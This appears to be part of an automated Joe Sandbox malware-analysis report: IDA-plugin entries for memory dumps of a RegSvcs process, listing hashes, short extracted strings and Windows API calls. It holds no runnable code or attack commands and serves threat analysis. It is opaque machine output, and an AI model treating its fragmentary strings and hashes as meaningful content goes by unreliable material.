                                                                  • Opcode ID: bd0588e3ada1dcae60282123c2aaf9611af198a94d3a2c56a042b37d8b9bbc63
                                                                  • Instruction ID: b4b5f847ac4e05152c400f4240d579d9a5d8650e2dcedefe38456fd0eb425aa2
                                                                  • Opcode Fuzzy Hash: bd0588e3ada1dcae60282123c2aaf9611af198a94d3a2c56a042b37d8b9bbc63
                                                                  • Instruction Fuzzy Hash: 39227070E502098FDFA4DB68D5A07AEBBF5EB45310F218926E805D7395DB34EC81CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2c4c4d711ee8e62c6a4064515df7ea32f98ebbcd185c44dc13a9cda604eecc8c
                                                                  • Instruction ID: d4d3bbba3a1446d592aef8623314b8a26feeeee1b4b070d943912f44ba9fbc60
                                                                  • Opcode Fuzzy Hash: 2c4c4d711ee8e62c6a4064515df7ea32f98ebbcd185c44dc13a9cda604eecc8c
                                                                  • Instruction Fuzzy Hash: 69B15D71E002098FDB20CFA9C9857EDBBF6AF88314F14C529D459E7295EB749845CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 75730f30da9bfd3f44066a463d6122042cbab15029cfcac98b31b554c58ebbc6
                                                                  • Instruction ID: 3128e6ab5b264e6a483c3eabcb287b14daa35d3cdd822d601ce2d93802c31a22
                                                                  • Opcode Fuzzy Hash: 75730f30da9bfd3f44066a463d6122042cbab15029cfcac98b31b554c58ebbc6
                                                                  • Instruction Fuzzy Hash: D3917B71E00209CFDF10DFA9C9857AEBBF6BF98304F14C129E419A7294EB749985CB81

                                                                  Control-flow Graph

                                                                  control_flow_graph: basic-block graph for the function starting at 605ad48 (entry block 605ad48-605ad66; rendered graph and edge list not reproduced in text)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-666546452
                                                                  • Opcode ID: 76a9be8c792f63c1262703e65833027b80437a25b2add6b7aae87d55221acf44
                                                                  • Instruction ID: 9b0e3cb2bc07dc9bb60e38d1a541ebdf237c1eeccd9881c3166e6cfea7072737
                                                                  • Opcode Fuzzy Hash: 76a9be8c792f63c1262703e65833027b80437a25b2add6b7aae87d55221acf44
                                                                  • Instruction Fuzzy Hash: 08E16F30F502098FCB95DFA9D5506AEBBF6EF85300F118629E815AB355DB34EC45CB90

                                                                  Control-flow Graph

                                                                  control_flow_graph: basic-block graph for the function starting at 605b6c8 (entry block 605b6c8-605b6e8; rendered graph and edge list not reproduced in text)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3356825164
                                                                  • Opcode ID: 16878924feff703337a4cd93feae867c3a119480e0582a5dde0cb60d07673ceb
                                                                  • Instruction ID: 6d200fa583391e10725b09cf59a3bbc7e4077b095be1de16c65e34f9debe57a1
                                                                  • Opcode Fuzzy Hash: 16878924feff703337a4cd93feae867c3a119480e0582a5dde0cb60d07673ceb
                                                                  • Instruction Fuzzy Hash: D1029D30E402098FDBA4DF68D5A06AEBBF1FF45310F21892AD805DB255DB74ED85CB91

                                                                  Control-flow Graph

                                                                  control_flow_graph: basic-block graph for the function starting at 60591c0 (entry block 60591c0-60591e5; rendered graph and edge list not reproduced in text)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq
                                                                  • API String ID: 0-2428501249
                                                                  • Opcode ID: 81b434781613a7e914e9756865932855dfec89075df23f50f20d037f79f5bb1d
                                                                  • Instruction ID: 7b395cd69dfb93f151d2d465e8593f6cfcd4aa97c081b345664b9dbbbdb3a1af
                                                                  • Opcode Fuzzy Hash: 81b434781613a7e914e9756865932855dfec89075df23f50f20d037f79f5bb1d
                                                                  • Instruction Fuzzy Hash: A7918030F4020A8FDF94DB69D950BAF77F6EF84200F108569D809EB358EA749D468B90

                                                                  Control-flow Graph

                                                                  control_flow_graph: basic-block graph for the function starting at 605cfb8 (entry block 605cfb8-605cfd3; rendered graph and edge list not reproduced in text)
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq
                                                                  • API String ID: 0-3696375380
                                                                  • Opcode ID: 134bd9332da8c56784627cfb9729cb1f955d8840e31305dd728ef5a3b424480f
                                                                  • Instruction ID: 9a5f8aabc8ece9c7fe99420452045ee631d8146e60538df29f9c8704d4634d56
                                                                  • Opcode Fuzzy Hash: 134bd9332da8c56784627cfb9729cb1f955d8840e31305dd728ef5a3b424480f
                                                                  • Instruction Fuzzy Hash: C1624E30A402098FCB55EF68E590A5EB7F6FF84300B218A69D4059F369EB75ED46CF81

                                                                  Control-flow Graph
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: foq$XPoq$\Ooq
                                                                  • API String ID: 0-3137531485
                                                                  • Opcode ID: 55ae2ba98387f8e03badf3bd910bab8c63e46a979bef507734d3387d501e7c22
                                                                  • Instruction ID: 7debc1d9c409aab6872f9a4bb99ded340a297bd33e43db4044ab173f3baffe90
                                                                  • Opcode Fuzzy Hash: 55ae2ba98387f8e03badf3bd910bab8c63e46a979bef507734d3387d501e7c22
                                                                  • Instruction Fuzzy Hash: 1F616230E002089FEF549BA9C855BAEBBF6FF88300F208529E505AB395DF758D458B51

                                                                  Control-flow Graph
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq
                                                                  • API String ID: 0-3720491408
                                                                  • Opcode ID: 3139802e25188a311701ad86a2de03134df56991bcb185abc3a2aa865480af7b
                                                                  • Instruction ID: a831d9d725da7e9637adc3b8d698362e4b42c6e5d9fa9dec3994e8a1cc67e484
                                                                  • Opcode Fuzzy Hash: 3139802e25188a311701ad86a2de03134df56991bcb185abc3a2aa865480af7b
                                                                  • Instruction Fuzzy Hash: 5C517031B001458FDF95EB68D990B6F77F6EF88200F108569D809EB398EA74EC46CB91

                                                                  Control-flow Graph
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: foq$XPoq
                                                                  • API String ID: 0-1558145954
                                                                  • Opcode ID: f572c2d4739daa6d9fca33507cf8af4d2af053be3c19c5f0c207d50460fb4db5
                                                                  • Instruction ID: 7b45206faa9d751f7a7fd7577ccd2993536aec67b948c22acc7aca91fb78ab18
                                                                  • Opcode Fuzzy Hash: f572c2d4739daa6d9fca33507cf8af4d2af053be3c19c5f0c207d50460fb4db5
                                                                  • Instruction Fuzzy Hash: 8E517171F002089FEB549FA9C815BAEBBF6FF88700F208529E505EB395DA758C418B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 6049e545582b4058f0ec23a6187b86e8cfab80d050a881dbd8311619e63e5943
                                                                  • Instruction ID: 1b85e7d9997ad49f7c896fb53c9f6a10ea3d736c6d9753e7c2096b620a44ed98
                                                                  • Opcode Fuzzy Hash: 6049e545582b4058f0ec23a6187b86e8cfab80d050a881dbd8311619e63e5943
                                                                  • Instruction Fuzzy Hash: B88144B0A00B059FD7B4EF2AD44575ABBF5FF88304F008A2AD48AD7A50DB35E945CB91
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D622
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 564d8c094d965ec869cf77ef26017f5475fa60893d41b103f9f408dfe65183db
                                                                  • Instruction ID: 1038372efac9222f0ce02915d09bc9547ff2a9bfd53194ec9b3ad3a9a35a71ca
                                                                  • Opcode Fuzzy Hash: 564d8c094d965ec869cf77ef26017f5475fa60893d41b103f9f408dfe65183db
                                                                  • Instruction Fuzzy Hash: 2851CDB1D003499FDB64DF99C984ADEBFB5FF48310F24852AE819AB250D775A881CF90
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0604D622
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 999189cee8a2f879594f3d9c0ed53c1587d583163b7af6221c581b9c6fd54dd6
                                                                  • Instruction ID: 972b7a31c33429a43ed1850711876652d902c718f1baedf14ac12d7de950a158
                                                                  • Opcode Fuzzy Hash: 999189cee8a2f879594f3d9c0ed53c1587d583163b7af6221c581b9c6fd54dd6
                                                                  • Instruction Fuzzy Hash: 9F41AEB1D003499FDB24DF99C984ADEBFB5FF48310F24852AE819AB250D775A885CF90
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 0604FD11
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: 5e1dd0d852f01adfc73d7702ace7638be5325d567c9bebac0ed4c78a9e677479
                                                                  • Instruction ID: e95a2e349a76b9a0baf05ebd8e725f679caa0988c9cc49bc478b386e0df7ca53
                                                                  • Opcode Fuzzy Hash: 5e1dd0d852f01adfc73d7702ace7638be5325d567c9bebac0ed4c78a9e677479
                                                                  • Instruction Fuzzy Hash: 084139B4A00205DFDB54DF99C548AAABBF5FF88310F24C859E519AB321C375A841CFA0
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060430D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 33e7a160dc8262fbc434ce0663fb044f28c2926e17966b3b766a3033b5486e60
                                                                  • Instruction ID: 55c688ec4a35b0b8761ffc836d236d63aef6a0f1f56ec866271d5ef13548ab21
                                                                  • Opcode Fuzzy Hash: 33e7a160dc8262fbc434ce0663fb044f28c2926e17966b3b766a3033b5486e60
                                                                  • Instruction Fuzzy Hash: EE21E3B5D002589FDB10CF9AD984AEEBFF5EB48310F14842AE919A7350D379A940CFA1
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060430D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 2d9dfa9f55f01e7b27fafecbda54453fdad6eef23b647c700ef3aeb6cbe9a572
                                                                  • Instruction ID: 319589a41dfea4250596de3768e2f4f57807c3d96cd78823000f86e9c99388a7
                                                                  • Opcode Fuzzy Hash: 2d9dfa9f55f01e7b27fafecbda54453fdad6eef23b647c700ef3aeb6cbe9a572
                                                                  • Instruction Fuzzy Hash: F021C4B59002489FDB10DF9AD984ADEFFF9FB48310F14841AE918A3350D379A944CFA5
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0097EC5F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 63af09f42c68e8ad05dcf4f988e957397955f94f5986c91cbcabc86d09a42638
                                                                  • Instruction ID: 246dbc80a6309dc9dde16a6966401f4533628731b0c9dcc8106fe341a2e38e93
                                                                  • Opcode Fuzzy Hash: 63af09f42c68e8ad05dcf4f988e957397955f94f5986c91cbcabc86d09a42638
                                                                  • Instruction Fuzzy Hash: 651114B6C006599BCB10DF9AC5447DEFBF4FF48320F14816AE918A7240D778A941CFA5
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0097EC5F
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 55fc6624f18353732cc8fd2e617365768c84d7dc3c2850f9076c398d2b5a8892
                                                                  • Instruction ID: d149d58702e8ce38eadcf2d1bf5fcd60b4ea08dccc2347255222c204a284d717
                                                                  • Opcode Fuzzy Hash: 55fc6624f18353732cc8fd2e617365768c84d7dc3c2850f9076c398d2b5a8892
                                                                  • Instruction Fuzzy Hash: A911E2B1C006599BCB10DF9AC544B9EFBF4EF49320F14816AD918A7240D778A944CFA5
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0604B344), ref: 0604B57E
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 9c82a38f253369a667e0d9a0e253a5b93aace79dad04a86e9a579a4a7d0bdf08
                                                                  • Instruction ID: 9088651cf715c141aef9ecd1b1491e021ff7264b879d242e35613aac351e6b5f
                                                                  • Opcode Fuzzy Hash: 9c82a38f253369a667e0d9a0e253a5b93aace79dad04a86e9a579a4a7d0bdf08
                                                                  • Instruction Fuzzy Hash: D51102B5C007498FDB20EFAAC444B9EFBF4EB49310F14842AD419B7210D379A545CFA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHjq
                                                                  • API String ID: 0-751881793
                                                                  • Opcode ID: 09980b7a06ab8c3e6663b8248e23ae0eb0dc25fe606de1ecdd411e87ae87d2fc
                                                                  • Instruction ID: d7dffe6ef7d939d019e8041e15f6aa0edee532b4844f78d69b1fb8e6442e9b0d
                                                                  • Opcode Fuzzy Hash: 09980b7a06ab8c3e6663b8248e23ae0eb0dc25fe606de1ecdd411e87ae87d2fc
                                                                  • Instruction Fuzzy Hash: DE41AF70E4060ADFDB94DF64C9546AFBFB6BF85300F11492AD802EB290EB74D846CB95
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: PHjq
                                                                  • API String ID: 0-751881793
                                                                  • Opcode ID: adc4488c6b92aaf8f8e3e35a94bab01c3e7a1b75d6f583f031b2f0d02117479c
                                                                  • Instruction ID: c04cd627c4c371edb7170775e0c28b78f4cda5661563c249771d95aea1a68c54
                                                                  • Opcode Fuzzy Hash: adc4488c6b92aaf8f8e3e35a94bab01c3e7a1b75d6f583f031b2f0d02117479c
                                                                  • Instruction Fuzzy Hash: DE31F031B002048FCB98AB38C95466F7BE6FFC8200F118429D806DB399DE35DE46CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq
                                                                  • API String ID: 0-2886413773
                                                                  • Opcode ID: 682c7ba93ae1133ae078aa44440ed07726b2b688aa704dfd250f95d2adc08505
                                                                  • Instruction ID: ad64b4e23136a55b0eabeab583f3282eb78a3ab37a804b2fbad51009b4957091
                                                                  • Opcode Fuzzy Hash: 682c7ba93ae1133ae078aa44440ed07726b2b688aa704dfd250f95d2adc08505
                                                                  • Instruction Fuzzy Hash: 6DF0AF36A802248FDFA8AE49EA816AE7BF5EB40311F12C039DD05D7245D635DA85CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da498452cc47cf5c157a7e7805ec97b85e15a07ec4c714e23b8d0f362980e11c
                                                                  • Instruction ID: d36849cbee41a2c221d1e545e2c72039b9e7825f107d63a8553e8b2049a179e5
                                                                  • Opcode Fuzzy Hash: da498452cc47cf5c157a7e7805ec97b85e15a07ec4c714e23b8d0f362980e11c
                                                                  • Instruction Fuzzy Hash: 1761C271F505114BCB94AA6EC88466FBADBEFC4620B564039E80ADB378DE76DD0287C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bce0f983710e4eb2661942496e46d74eed7df044de3e317182af01286272b78
                                                                  • Instruction ID: f481cdc3e49c7ffb3472d165e5d3979beb66d071b01b9b04317659abcd557f6c
                                                                  • Opcode Fuzzy Hash: 9bce0f983710e4eb2661942496e46d74eed7df044de3e317182af01286272b78
                                                                  • Instruction Fuzzy Hash: 6101F932E112149BDF54AA69F841AAEBBB5FBC4314F00843DE901DB344EB319D448BC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0237caa2fdba1c834f08d7869a56128c3bcf013905b99d9b440f7cdff1e9a0bc
                                                                  • Instruction ID: 701a835088525e21a94fe3d19d4b52ccce56625d3bbac0b24cc5b223b231bd98
                                                                  • Opcode Fuzzy Hash: 0237caa2fdba1c834f08d7869a56128c3bcf013905b99d9b440f7cdff1e9a0bc
                                                                  • Instruction Fuzzy Hash: FBE04871DA41496FEF90CA70C90976B7BFDD702214F9185A4D904C7242F177CD418790
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-3810553869
                                                                  • Opcode ID: 8ae9104c870abe74bcba238204eb09fbc2c3a2f4db4960ed34148d2e469970f5
                                                                  • Instruction ID: ac45c8ab0759ccb9bc3ea4a9f46cae9e8424dec2674d55fc85fcdf576ad0e34f
                                                                  • Opcode Fuzzy Hash: 8ae9104c870abe74bcba238204eb09fbc2c3a2f4db4960ed34148d2e469970f5
                                                                  • Instruction Fuzzy Hash: 7A123B31E412198FDB64DF69C954AAEBBF2FF84300F218569D809AB365DB309D81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0oMp$DqMp$PHjq
                                                                  • API String ID: 0-2971219899
                                                                  • Opcode ID: 4c634ed0564f33c53c971ce4c43abdfbdb0a1467dd7207b29f1b3c924d795f44
                                                                  • Instruction ID: c8f8b59494962dcf97f6e916c7f815d964a159d54235f0aea5ad05ce06a83ee3
                                                                  • Opcode Fuzzy Hash: 4c634ed0564f33c53c971ce4c43abdfbdb0a1467dd7207b29f1b3c924d795f44
                                                                  • Instruction Fuzzy Hash: 9122D130B001088FDB94DB68D594A6EBBF6FF88310F218569D84ADB365EB35ED41CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: XPoq$\Ooq
                                                                  • API String ID: 0-3424527247
                                                                  • Opcode ID: 3d486e11a052a8c47f931593e5c4da286f4e74c24ff0a6573359f5aaee9c752b
                                                                  • Instruction ID: 5050ef8ca7bf35f7710fac6327aa33baa110be32242f05489d5489f56b000deb
                                                                  • Opcode Fuzzy Hash: 3d486e11a052a8c47f931593e5c4da286f4e74c24ff0a6573359f5aaee9c752b
                                                                  • Instruction Fuzzy Hash: 93D1E831B501144FDF95DB68C854A6FBBF6FB88310F66846AE80ADB361CA36DC41CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7736c9b2b8ac81c8fffc8bb0e1aadf303295ba78e9aea85ee64968e5078bf154
                                                                  • Instruction ID: 36f476753776acc473007b29cc78116c1ce119a4aac7d8c3b8283264c772a9f2
                                                                  • Opcode Fuzzy Hash: 7736c9b2b8ac81c8fffc8bb0e1aadf303295ba78e9aea85ee64968e5078bf154
                                                                  • Instruction Fuzzy Hash: 7423F931D10A1A8EDB51EF68C88069DF7B1FF99300F15D69AE458B7221EB70AAD4CF41
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3313961702.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_970000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: af732fa691204e24b4f22e39d909f1dc8d765c4744d4ebb0784479da72433534
                                                                  • Instruction ID: f6acb89a3490cda10ad24d03d8cb8f73f5b7b1919aaa87a78b4cbb6a939b34b3
                                                                  • Opcode Fuzzy Hash: af732fa691204e24b4f22e39d909f1dc8d765c4744d4ebb0784479da72433534
                                                                  • Instruction Fuzzy Hash: ABB16C71E00219CFDB14CFA9C9857ADBBF6BF88704F14C129E819A72A5EB349841CF81
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317601190.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6040000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4f27e84115d26b11130f4670edeebd378444cc6090ec76904fad5706e51217ca
                                                                  • Instruction ID: 204b041f9aa2e8381f8b47639a295584d04859c5bca0562680f22cd891e7a221
                                                                  • Opcode Fuzzy Hash: 4f27e84115d26b11130f4670edeebd378444cc6090ec76904fad5706e51217ca
                                                                  • Instruction Fuzzy Hash: 49A16D72F802098FCF95EFB5C8805DEBBB6BF84300B15457AE815AB225DB35E945DB80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_6050000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                                  • API String ID: 0-666546452
                                                                  • Opcode ID: 42274d679f22035abaf02edbb8907796c1f8263bb8efd190e35b05a3eb09033d
                                                                  • Instruction ID: ab859165389025c0474e062c3cc32770171eaa7d0d026a5be9103ef10da0efcf
                                                                  • Opcode Fuzzy Hash: 42274d679f22035abaf02edbb8907796c1f8263bb8efd190e35b05a3eb09033d
                                                                  • Instruction Fuzzy Hash: 92914C30B402099FEB94EF65D555BAF7FF6EF84300F118629E8019B295DB749D81CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.3317693273.0000000006050000.00000040.00000800.00020000.00000000.sdmp, Offset: 06050000, based on PE: false
